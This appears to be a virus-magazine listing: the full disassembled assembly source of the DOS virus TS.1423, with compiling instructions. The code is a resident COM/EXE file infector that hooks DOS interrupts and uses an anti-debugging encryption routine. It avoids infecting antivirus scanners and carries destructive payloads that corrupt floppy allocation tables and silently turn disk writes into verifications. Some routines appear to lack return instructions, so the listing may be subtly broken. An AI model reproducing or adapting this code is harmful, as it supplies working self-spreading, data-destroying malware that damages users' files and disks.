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29A Issue 01 04 04

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 · 4 years ago


; TS.1423
; Virus disassembly by Tcp
; Virus : TS.1423
; Author: Unknown
; Where : Spain
; This is a pretty curious virus i disassembled a few time ago, when 29A
; wasn't more than a project :) It's well programmed and its best feature
; is the encryption routine, based on tracing the code via int 1, which
; makes the virus decryption and disassembly quite difficult. About the
; rest of the virus, just a little mention about the UMB residency and the
; payloads (nothing special). I'd describe it as follows:
; þ Infects COM and EXE files on closing (3eh)
; þ Encrypted; uses a decryption routine via int 1
; þ Thus, highly antidebugging :)
; þ It doesn't infect *AN*.* (Scan, TbScan...)
; þ Marks clusters as bad on floppies if the year is above 1995
; þ On friday, if the year is above 1995, changes disk writes to disk
; verifications
; Btw... this source code was fully commented in spanish, but i'm too lazy
; to translate it and it's easy to understand, so i'll leave it uncommen-
; ted; if you have any doubt about it, look for me in #virus or e-mail me
; at
; Compiling instructions:
; tasm /m ts1423.asm
; tlink ts1423.obj
; exe2bin ts1423.exe

_bytes equ (header-start)+(_length-start)-(end_decr-start)
_parag equ _bytes/16+1

ts1423 segment byte public
assume cs:ts1423, ds:ts1423
org 0

start: call get_delta

_mask db 0

int_1: xor byte ptr cs:[di],0aah
mov bp,sp
mov di,[bp]
xor byte ptr cs:[di],0aah

get_delta: pop si
push ds
push es
xor ax,ax
mov ds,ax
mov ax,si
inc ax
mov ds:[0004],ax
mov ds:[0006],cs
mov bp,sp
xor byte ptr [bp-1],1
mov di,si
add di,offset end_decr-2
mov ah,cs:[si]

; First byte, encrypted with aah ; Decrypted instruction ;
; ³ :
db 29h,0eeh,3 ; sub si,3 -> offset int_1
db 21h,0d6h ; mov dx,si
db 13h
dw offset _length-offset end_decr ; mov cx,offset...
db 2bh,0c6h
dw offset end_decr ; add si,offset end_decr
db 56h ; cld
loop_1: db 84h,30h,24h ; xor cs:[si],ah ; Second routine
db 0ech ; inc si
db 48h,0fah ; loop loop_1
end_decr: db 37h ; popf -> trace off (int_1 inactive)

mov si,dx
cmp cs:[si+file_type],0
je com_file
mov ax,cs
add cs:[si+file_cs],ax
mov ax,cs:[si+file_cs]
add cs:[si+file_ss],ax

com_file: mov bx,'TC'
mov ax,'0.'
int 21h
or ax,ax
jne no_resident
jmp no_activation

no_resident: cmp al,5
jb no_UMB
mov ax,5800h
int 21h

push ax
mov ax,5802h
int 21h

push ax
xor dx,dx
mov ax,5803h
mov bx,1
int 21h

jc UMB_error
mov ax,5801h
mov bx,81h
int 21h

jc UMB_error
mov bx,_parag
mov ah,48h
int 21h

jc UMB_error
mov dx,ax

UMB_error: pop bx
xor bh,bh
mov ax,5803h
int 21h

pop bx
xor bh,bh
mov ax,5801h
int 21h

mov ax,dx
or ax,ax
jnz mem_ok

no_UMB: mov ax,es
dec ax
mov ds,ax
mov bx,ds:[0003]
sub bx,_parag+1
mov ah,4ah
int 21h

mov bx,_parag
mov ah,48h
int 21h

mem_ok: mov es,ax
dec ax
mov ds,ax
mov ah,2ah
int 21h

mov es:year,cl
cmp cl,0cah
ja y_1995
xor al,al

y_1995: push ax
mov word ptr ds:[0001],8
push si
push cs
pop ds
xor di,di
mov cx,offset _length
rep movsb
pop si
mov dx,es
mov ds,dx
mov ax,3521h
int 21h

mov ds:ofs_int21,bx
mov ds:seg_int21,es
mov es,dx
mov dx,offset int_21
mov ax,2521h
int 21h

pop ax
cmp al,5
jne no_activation
push es

mov ax,3513h
int 21h

mov ds:ofs_int13,bx
mov ds:seg_int13,es
pop es
mov dx,offset int_13
mov ax,2513h
int 21h

no_activation: pop es
pop ds
cmp cs:[si+file_type],0
je exec_com

mov ss,cs:[si+file_ss]
mov sp,cs:[si+file_sp]
xor ax,ax
xor bx,bx
xor cx,cx
xor dx,dx
xor si,si
xor di,di
xor bp,bp

db 0eah
file_ip dw 0
file_cs dw 0

exec_com: popf
add si,offset bytes_com
mov di,100h
push di
mov cx,3
rep movsb

int_21: cmp ah,30h
je get_OS
cmp ah,57h
je f_date
cmp ah,3ch
je open_functions
cmp ah,5bh
je open_functions
cmp ah,3dh
je open_functions
cmp ah,6ch
je open_functions
cmp ah,3eh
je close
cmp ah,4bh
je exec

jmp_21: jmp dword ptr cs:ofs_int21

call_21: pushf
call dword ptr cs:ofs_int21

int_ret: push bp
mov bp,sp
jc put_error
and byte ptr [bp+6],0FEh
pop bp

put_error: or byte ptr [bp+6],1
pop bp

get_OS: cmp al,'.'
jne jmp_21
cmp bx,'TC'
jne jmp_21
xor ax,ax

f_date: or al,al
jz jmp_21
xor al,al
push cx
push dx
call dword ptr cs:ofs_int21
jc error_g_date

and cx,1fh
cmp cx,1fh
pop dx
pop cx
mov al,1
jnz jmp_jmp21
or cx,1fh

jmp_jmp21: jmp jmp_21

error_g_date: pop dx
pop cx
jmp int_ret

open_functions: call mark_bad
call valid_name
jc jmp_21
call dword ptr cs:ofs_int21
jc int_ret

mov cs:handle,ax
jmp int_ret

close: cmp cs:handle,bx
jne jmp_21
call dword ptr cs:ofs_int21
jc int_ret
jmp infection

exec: call valid_name
jc jmp_jmp21_2
jmp infection

jmp_jmp21_2: jmp jmp_21

infection: push ax
push bx
push cx
push dx
push si
push di
push ds
push es
push cs
pop ds
mov dx,offset file_name
call get_drive
mov ah,36h
int 21h

cmp ax,0ffffh
je jmp_end_infect

mul bx
mul cx
or dx,dx
jnz space
cmp ax,offset _length
jae space

jmp_end_infect: jmp end_infect

space: mov ax,3524h
int 21h

mov cs:ofs_int24,bx
mov cs:seg_int24,es
push cs
pop es
mov dx,offset int_24
mov ax,2524h
int 21h

mov dx,offset file_name
mov ax,4300h
int 21h

jc jmp_set_24
mov cs:file_attribs,cx
xor cx,cx
mov ax,4301h
int 21h
jnc open_file

jmp_set_24: jmp set_24

open_file: mov ax,3d02h
call dword ptr cs:ofs_int21
jnc file_opened
jmp set_attribs

file_opened: mov bx,ax
call get_datetime
jc jmp_jmp_close

call lseek_end
jc jmp_jmp_close
mov si,ax
mov di,dx
or dx,dx
jnz valid_length
cmp ax,offset _length
jb jmp_jmp_close

valid_length: call lseek_start
jc jmp_jmp_close
mov cx,1ch
mov dx,offset header
mov ah,3fh
int 21h

jc jmp_jmp_close
push di
mov di,dx
cmp word ptr [di],'ZM'
pop di
jz exe_infect

mov cs:file_type,0
sub si,3
mov cs:jmp_offset,si
add si,offset _length+3
jc jmp_jmp_close
mov si,dx
mov di,offset bytes_com
mov cx,3
rep movsb
jmp exe_com

exe_infect: mov cs:file_type,1
cmp cs:hdrsize,0
jne no_hdr_0

jmp_jmp_close: jmp jmp_close_file

no_hdr_0: mov ax,cs:exe_sp
mov cs:file_sp,ax
mov ax,cs:relo_ss
mov cs:file_ss,ax
mov ax,cs:exe_ip
mov cs:file_ip,ax
mov ax,cs:relo_cs
mov cs:file_cs,ax
sub cs:file_ss,ax
mov ax,cs:page_cnt
cmp cs:part_pag,0
je no_sub
dec ax

no_sub: mov cx,200h
mul cx
add ax,cs:part_pag
adc dx,0
cmp ax,si
jne jmp_jmp_close
cmp dx,di
jne jmp_jmp_close
push ax
push dx
add ax,offset _length
adc dx,0
mov cx,200h
div cx

or dx,dx
jz no_add
inc ax

no_add: mov cs:page_cnt,ax
mov cs:part_pag,dx
pop dx
pop ax
mov cx,10h
div cx
mov cs:exe_ip,dx
sub ax,cs:hdrsize
mov cs:relo_cs,ax
sub cs:file_cs,ax
mov cs:relo_ss,ax
mov cs:exe_sp,offset f_stack
call lseek_start
jc jmp_close_file

mov cx,1ch
mov dx,offset header
mov ah,40h
int 21h
jc jmp_close_file

exe_com: call lseek_end
jc jmp_close_file
push es
xor dx,dx
mov es,dx
mov ah,es:[046ch]
or ah,ah
jnz mask_no_0
mov ah,43h

mask_no_0: mov cs:_mask,ah
pop es
mov cx,offset end_decr
mov ah,40h
int 21h
jnc no_write_error

jmp_close_file: jmp close_file

no_write_error: mov ah,cs:_mask
mov si,offset end_decr
mov di,offset header
mov cx,offset _length-offset end_decr

loop_encrypt: lodsb
xor al,ah
mov [di],al
inc di
loop loop_encrypt

mov cx,offset _length-offset end_decr
mov dx,offset header
mov ah,40h
int 21h

jc set_date
cmp cs:file_type,1
je set_date
call lseek_start
jc set_date
mov cx,3
mov dx,offset jmp_op
mov ah,40h
int 21h

set_date: call set_datetime

close_file: mov ah,3eh
call dword ptr cs:ofs_int21

set_attribs: mov dx,offset file_name
mov cx,cs:file_attribs
mov ax,4301h
int 21h

set_24: lds dx,dword ptr cs:ofs_int24
mov ax,2524h
int 21h

end_infect: pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
mov cs:handle,0ffffh
cmp ah,4bh
je jmp_jmp21_3
jmp int_ret

jmp_jmp21_3: jmp jmp_21

int_24: xor al,al

int_13: cmp ah,3
jne no_write
mov ah,4

no_write: jmp dword ptr cs:ofs_int13

get_datetime: push ax
push cx
push dx
mov ax,5700h
call dword ptr cs:ofs_int21
jc no_infect

mov cs:file_date,dx
mov cs:file_time,cx
and cx,1fh
cmp cx,1fh
je no_infect
or cs:file_time,1fh
jmp end_getdate

no_infect: stc

end_getdate: pop dx
pop cx
pop ax

set_datetime: push ax
push cx
push dx
mov dx,cs:file_date
mov cx,cs:file_time
mov ax,5701h
call dword ptr cs:ofs_int21
pop dx
pop cx
pop ax

valid_name: cmp cs:handle,0ffffh
je ready

ready: push ax
push si
push di
cmp ah,6ch
je si_ok
mov si,dx

si_ok: cld
mov di,offset file_name

next_letter: lodsb
cmp al,'a'
jb no_lowercase
cmp al,'z'
ja no_lowercase
sub al,20h

no_lowercase: mov cs:[di],al
inc di
or al,al
jnz next_letter
cmp cs:[di-3],'MO'
jne no_com_ext
cmp cs:[di-5],'C.'
je valid

no_com_ext: cmp byte ptr cs:[di-6],'N'
je no_valid
cmp cs:[di-3],'EX'
jne no_valid
cmp cs:[di-5],'E.'
je valid

no_valid: stc

valid: pop di
pop si
pop ax

get_drive: mov di,dx
xor dl,dl
cmp byte ptr [di+1],':'
jne default_drive
mov dl,[di]
and dl,1fh

default_drive: ret

lseek_end: mov ax,4202h
xor cx,cx
mov dx,cx
int 21h

lseek_start: mov ax,4200h
xor cx,cx
mov dx,cx
int 21h

mark_bad: cmp cs:year,0cah
ja activation

activation: push ax
push bx
push cx
push dx
push ds
push es
push di
cmp ah,6ch
jne no_extended
mov dx,si

no_extended: call get_drive
mov al,dl
dec al
cmp al,0ffh
jne with_drive
mov ah,19h
int 21h

with_drive: cmp al,1
ja no_act
mov byte ptr cs:file_attribs,al
push cs
pop ds
mov al,byte ptr cs:file_attribs
mov cx,1
xor dx,dx
mov bx,offset header
int 25h

add sp,2
jc no_act
mov al,byte ptr cs:file_attribs
mov dx,[bx+16h]
mov cs:file_time,dx
mov dx,[bx+0eh]
int 25h

add sp,2
jc no_act
mov cx,200h
add cx,bx
mov di,bx

next_cluster: mov ax,[di]
or al,[di+2]
add di,3
cmp di,cx
jae no_act
or ax,ax
jnz next_cluster

sub di,3
mov [di],7ff7h
mov byte ptr [di+2],0ffh
mov al,byte ptr cs:file_attribs
mov cx,1
int 26h

add sp,2
jc no_act
mov al,byte ptr cs:file_attribs
add dx,cs:file_time
int 26h

add sp,2

no_act: pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax

file_sp dw 020cdh
file_ss dw 0
file_type db 0
handle dw 0
jmp_op db 0e9h


jmp_offset dw 0
ofs_int21 dw 0
seg_int21 dw 0
ofs_int24 dw 0
seg_int24 dw 0
ofs_int13 dw 0
seg_int13 dw 0
year db 0
file_attribs dw 0
file_date dw 0
file_time dw 0
file_name db 65 dup (?)

signature dw 0
part_pag dw 0
page_cnt dw 0
relo_cnt dw 0
hdrsize dw 0
minmem dw 0
maxmem dw 0
relo_ss dw 0
exe_sp dw 0
chksum dw 0
exe_ip dw 0
relo_cs dw 0
dw 0
dw 0

ts1423 ends
end start

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